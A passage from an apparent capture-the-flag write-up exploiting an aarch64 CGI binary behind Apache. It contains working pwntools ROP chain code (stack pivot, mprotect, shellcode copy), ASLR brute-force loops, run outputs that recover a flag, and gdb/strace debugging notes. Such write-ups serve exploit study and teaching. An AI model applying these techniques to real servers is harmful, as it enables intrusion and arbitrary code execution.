ldp x21, x22, [sp, #0x20];
ldp x23, x24, [sp, #0x30];
ldp x29, x30, [sp], #0x40;
ret;
Let's try calling the puts function.
"""
elf = pwn.ELF('./pwn.cgi')
rop = pwn.ROP(elf)
puts_addr = 0x400684
rop.raw(0xdeadbeef) # x29
rop.raw(puts_addr) # x30
rop.raw(0xdeadbeef) # x19
rop.raw(0xdeadbeef) # x20
rop.raw(0xdeadbeef) # x21
rop.raw(0xdeadbeef) # x22
rop.raw(0xdeadbeef) # x23
rop.raw(0xdeadbeef) # x24
payload += rop.chain()
return payload
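The padding expression is a bit cryptic, so here is a small standalone check of what it achieves. It is a sketch that reuses the same expression as rop() above, wrapped in a hypothetical helper called pad_tail: whatever the length of the key-value part, the padded body always has a length of 8 modulo 16. Given that the read buffer starts at an address ending in 8 (as the comment says), the rop chain appended afterwards starts on a 16-byte boundary.

```python
def pad_tail(payload):
    """Append the `a=bbb...xxxxxxxx&` tail used in rop() above."""
    payload += b"a="
    payload += b"b" * (16 - (len(payload) % 16) - 1) + b"x" * 8 + b"&"
    return payload

# The property holds for any number of key-value pairs.
for n in range(1, 0x35):
    body = pad_tail(b"&".join([b"a=b"] * n))
    assert len(body) % 16 == 8
```

The 8 x bytes are the "extra 8 bytes" mentioned in the comment, and the final & is the separator that x7 ends up pointing past.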
We need to run this in the VM (as it has ASLR), and we will fail a lot of times. So let’s write a helper function that collects the different messages and counts how many times each one shows up:
import collections
def run_and_collect(n):
    msgs = collections.Counter()
    payload = rop()
    for i in range(n):
        print(f"{i} / {n}", end='\r')
        res = run(payload)
        msgs.update([res])
    for msg, count in msgs.most_common():
        print(f"{count}/{n}: {msg}")
9968/10000: b'Content-type: text/html\n\n<h1>What is your name?</h1>\n'
19/10000: b'Content-type: text/html\n\n'
9/10000: b'Content-type: text/html\n\n*** stack smashing detected ***: terminated\n'
4/10000: b'Content-type: text/html\n\n<h1>Please provide your name with the name= parameter.</h1>\n'
4 in 10000, not too good, but also not too bad.
Adding the rest of the rop chain
Now that we found a way to get an exploit that bruteforces ASLR, let’s add the rest of the rop chain we had written.
def rop():
keyvals = [
b'\x7c\x59\x40=' + b'a'*28 + pwn.p16(0x9d18),
b'\x6c\xc4\x40=' + b'a'*28 + pwn.p16(0x9d48),
b'\x6c\xc4\x40=' + b'a'*28 + pwn.p16(0x9db8),
b'\x08\x04\x44=' + b'a'*28 + pwn.p16(0x9e28),
]
keyvals += [b'a=b'] * (0x34 - len(keyvals))
# The last entry should leave the stack aligned on a 16-byte boundary.
# As aarch64 will crash if sp is not aligned to 16 bytes.
# the read buffer starts at an address ending with 8, so we need
# to add an extra 8 bytes to align it to 16 bytes.
payload = b'&'.join(keyvals) + b'a='
payload += b'b' * (16 - (len(payload) % 16) - 1) + b'x' * 8 + b'&'
"""
If everything went well, we are executing the stack pivot gadget:
0x0000000000440408:
mov sp, x29;
ldp x19, x20, [sp, #0x10];
ldp x21, x22, [sp, #0x20];
ldp x23, x24, [sp, #0x30];
ldp x29, x30, [sp], #0x40;
ret;
"""
elf = pwn.ELF('./pwn.cgi')
rop = pwn.ROP(elf)
mprotect_addr = 0x420440
mapping_addr = 0x47d000
mprotect_size = 0x1000
mprotect_flags = mmap.PROT_READ|mmap.PROT_WRITE|mmap.PROT_EXEC
rop.raw(0xdeadbeef) # x29
rop.raw(0x4057dc) # x30, x2-load gadget
rop.raw(0xdeadbeef) # x19
rop.raw(0xdeadbeef) # x20
rop.raw(0xdeadbeef) # x21
rop.raw(0xdeadbeef) # x22
rop.raw(mprotect_flags) # x23, x2 in the next gadget. mprotect flags
rop.raw(0x427d0c) # x24, x16-branch gadget
"""
The x2-load gadget doesn't touch the stack.
It will branch to x24, x16-branch gadget.
0x4057dc:
mov x2, x23;
mov x1, x27;
mov x0, x26;
blr x24;
"""
"""
The x16-branch gadget loads x16, x1, x0, x29 and x30 from
the stack, advances the stack and branches to x16.
0x427d0c:
ldr x16, [sp, #0x60];
ldp x1, x0, [sp, #0x78];
ldp x29, x30, [sp], #0xb0;
br x16;
"""
rop.raw(0xdeadbeef) # x29
rop.raw(0x00445100) # x30, memcpy addr.
for i in range((0x60-0x10)//8):
rop.raw(0xdeadbeef) # filling until 0x60
rop.raw(mprotect_addr) # sp + 0x60
rop.raw(0xdeadbeef) # sp + 0x68
rop.raw(0xdeadbeef) # sp + 0x70
rop.raw(mprotect_size) # sp + 0x78 x1, size
rop.raw(mapping_addr) # sp + 0x80 x0, mapping addr
for i in range((0xb0 - 0x88)//8):
rop.raw(0xdeadbeef) # Filling until 0xb0.
code = shellcode()
memcpy(rop, mapping_addr, code, mapping_addr)
payload += rop.chain()
return payload
Let’s create the fake flag:
$ echo -n "srelabs{fake-flag}" > /tmp/flag
$ python3 babyarm.py
b'Content-type: text/html\n\n<h1>What is your name?</h1>\n'
b'Content-type: text/html\n\n'
b'Content-type: text/html\n\n*** stack smashing detected ***: terminated\n'
b'Content-type: text/html\n\nHello, World\n\x00srelabs{fake-flag}'
Trying it against the webserver.
Now that we have an exploit that seems to work locally, let’s try it against our apache2 server.
$ python3 babyarm.py
b'<h1>What is your name?</h1>\n'
b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>500 Internal Server Error</title>\n</head><body>\n<h1>Internal Server Error</h1>\n<p>The server encountered an internal error or\nmisconfiguration and was unable to complete\nyour request.</p>\n<p>Please contact the server administrator at \n webmaster@localhost to inform them of the time this error occurred,\n and the actions you performed just before this error.</p>\n<p>More information about this error may be available\nin the server error log.</p>\n<hr>\n<address>Apache/2.4.52 (Ubuntu) Server at 127.0.0.1 Port 1337</address>\n</body></html>\n'
b''
It seems like it doesn’t work. We can debug it by attaching strace to all the apache2 processes and checking out some of the system calls:
$ sudo strace -ffff -e trace=openat,write -p 2289 -p 1167876 -p 1167875 -s 1000 2> syscalls
Then I watched the file until I confirmed that my payload was executing (I searched for “Hello”). From there, I saw two errors:
malformed header from script 'pwn.cgi': Bad header: Hello, World\n"
[pid 2193032] openat(AT_FDCWD, "/tmp/flag", O_RDONLY) = -1 ENOENT (No such file or directory)
For the first one, it turns out that if we call write directly, we might be missing some of the previous buffered output, and the cgi-bin scripts need to start with the Content-type: text/html\n\n header. We can fix this by adding that to our shellcode:
"""
(...)
hello_world:
.asciz "Content-Type: text/html\\n\\nHello, World\\n"
hello_world_len = . - hello_world
"""
For the second one, it looks like apache2 didn’t have access to the /tmp/flag file, but I checked and it did. I moved the flag to /flag and it worked.
$ python3 babyarm.py
b'<h1>What is your name?</h1>\n'
b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>500 Internal Server Error</title>\n</head><body>\n<h1>Internal Server Error</h1>\n<p>The server encountered an internal error or\nmisconfiguration and was unable to complete\nyour request.</p>\n<p>Please contact the server administrator at \n webmaster@localhost to inform them of the time this error occurred,\n and the actions you performed just before this error.</p>\n<p>More information about this error may be available\nin the server error log.</p>\n<hr>\n<address>Apache/2.4.52 (Ubuntu) Server at 127.0.0.1 Port 1337</address>\n</body></html>\n'
b''
b'Hello, World\n\x00srelabs{fake-flag}'
And finally, we can try it in the real server… But it will take some time.
Multiple attempts in the same payload.
Before, we observed that if we ended up with a low address in sp, we would be able to modify it from further down the keys list. So let’s take advantage of that and create a payload that targets multiple versions of the address space.
The lowest we can go is 0x0110, as we cannot use a NUL-byte. So this leaves us with at most 0x20 entries in the keys area to use; after that, we will always be outside the range reachable with 2 bytes. So in the end, we can only add 8 payloads:
def first_payload(base_addr):
    return [
        b'\x7c\x59\x40=' + b'a'*28 + pwn.p16(base_addr + 0x8),
        b'\x6c\xc4\x40=' + b'a'*28 + pwn.p16(base_addr + 0x38),
        b'\x6c\xc4\x40=' + b'a'*28 + pwn.p16(base_addr + 168),
        b'\x08\x04\x44=' + b'a'*28 + pwn.p16(base_addr + 168 + 0x70),
    ]
def rop():
    keyvals = []
    keyvals += first_payload(0x0910) # 0x20
    keyvals += first_payload(0x0810) # 0x1c
    keyvals += first_payload(0x0710) # 0x18
    keyvals += first_payload(0x0610) # 0x14
    keyvals += first_payload(0x0410) # 0x10
    keyvals += first_payload(0x0310) # 0x0c
    keyvals += first_payload(0x0210) # 0x08
    keyvals += first_payload(0x0110) # 0x04
    # rest of the rop code follows (...)
9796/10000: b'Content-type: text/html\n\n<h1>What is your name?</h1>\n'
97/10000: b'Content-type: text/html\n\n'
82/10000: b'Content-type: text/html\n\n*** stack smashing detected ***: terminated\n'
25/10000: b'Content-type: text/html\n\nContent-Type: text/plain\n\nHello, World\n\x00srelabs{fake-flag}'
A bit better. One in 400 tries seems reasonable. When I ran it against the real server, it found the flag in less than 200 tries (lucky, I guess).
b'Hello, World\n\x00SRLABS{______________}\n'
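To put the "lucky" in perspective, here is a quick back-of-the-envelope calculation. It assumes every attempt is independent and succeeds with the locally measured rate of 25 in 10000; the real server may well behave differently, so treat the numbers as a rough estimate.

```python
def success_within(tries, p):
    """Probability of at least one success in `tries` independent attempts."""
    return 1 - (1 - p) ** tries

p = 25 / 10000
print(f"expected tries: {1 / p:.0f}")                               # 400
print(f"P(success within 200 tries): {success_within(200, p):.2f}")  # 0.39
```

So under these assumptions, finding the flag in under 200 tries happens a bit less than 40% of the time.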
GDB Debugging Tips
Using gdb to debug ASLR issues can be cumbersome. Something you can do is re-run the program automatically until you hit your breakpoint.
Retrying after exit / crashes
You can do this with break commands. Set one at _exit and one for all signals:
(gdb) b _exit
Breakpoint 1 at 0x41ebe0
(gdb) commands
Type commands for breakpoint(s) 1, one per line.
End with a line saying just "end".
>run < payload
>end
(gdb) catch signal
Catchpoint 2 (standard signals)
(gdb) commands
Type commands for breakpoint(s) 2, one per line.
End with a line saying just "end".
>run < payload
>end
Conditional Breakpoints
If you are still seeing too much noise, you can also set conditional breakpoints.
Gotchas & Failed Attempts
While working on this challenge, I found some stuff that I wish I knew earlier, and there was also a lot of trial and error. This section describes all of that.
- sp must be aligned to 16 at all times.
- The code executed in QEMU and in the VM was different because glibc picks which implementation to use for string functions.
- The CGI-bin’s output needs to start with Content-Type: text/plain\n\n.
- strace makes a difference between open and openat.
Failed Experiments
Write to non-stack areas
You can change the value of the keys_ptr, but you cannot write NUL-bytes, which means that you can’t go outside of the stack.
Writing into values pointers.
If you provide an empty key, then you can change where the value gets copied to, but there doesn’t seem to be anything you can do there.
Going back to main or parse_body.
I kept wanting to reuse main, to read more from the buffer (you can’t because CGI-Bin script), or to reexecute everything with some changes. I couldn’t think of a way to use that.
Environment Variables.
You can control some environment variables, but I couldn’t think how to use them in any meaningful way. I even wrote a test cgi-bin script to print them out and see what can be done. You can’t write NUL-bytes to them, which limits the amount of stuff you can do.
#include <stdio.h>
int main(int argc, char** argv, char** envp) {
    printf("Content-type: text/html\n\n");
    printf("stack addr: %p\n", __builtin_frame_address(0));
    printf("argc: %d\n", argc);
    printf("argv: %p\n", argv);
    printf("envp: %p\n", envp);
    for (size_t i = 0; argv[i] != NULL; i++) {
        printf("argv[%zu] (%p -> %p): %s\n", i, &argv[i], argv[i], argv[i]);
    }
    for (size_t i = 0; envp[i] != NULL; i++) {
        printf("envp[%zu] (%p -> %p): %s\n", i, &envp[i], envp[i], envp[i]);
    }
    return 0;
}
Sending raw http requests.
I also tried sending manually crafted HTTP requests to the endpoint, thinking that maybe I would be able to see anything different, but I couldn’t.
Stack Layout Analysis.
There seems to be some slight biases towards one set of addresses vs others, but in the end, it didn’t feel like it made a difference.
Pass a huge read buffer.
The read system call that is done in main is huge. However, if you pass a huge buffer, it caps at around 32KiB.
Being able to change x12.
Before finding the issue with strncpy in QEMU vs the VM, I thought it would be possible to control x12, and I was able to do so to some extent: I could set a full 64-bit value to it, without NUL-bytes, nor &, nor =:
def rop():
keyvals = [
b'\x08\x04\x44=' + b'a'*28 + b'\xd8\xb2',
b'\x90\xe0\x7c=' + b'a'*28 + b'\xd0\xb2',
b'=' + b'\xbc'*18 + pwn.p64(0xdeadbeefabad1dea),
]
And in gdb, after setting up a breakpoint, I can see:
(gdb) p /x $x12
$1 = 0xdeadbeefabad1dea
This meant that we could add something to sp, but it has to be something huge. Basically, this means we can subtract stuff from it. Sadly, our read buffer was after sp, so subtracting stuff didn’t do us any good. I also thought about subtracting from the stack after main’s return, but even with that, I was missing another gadget.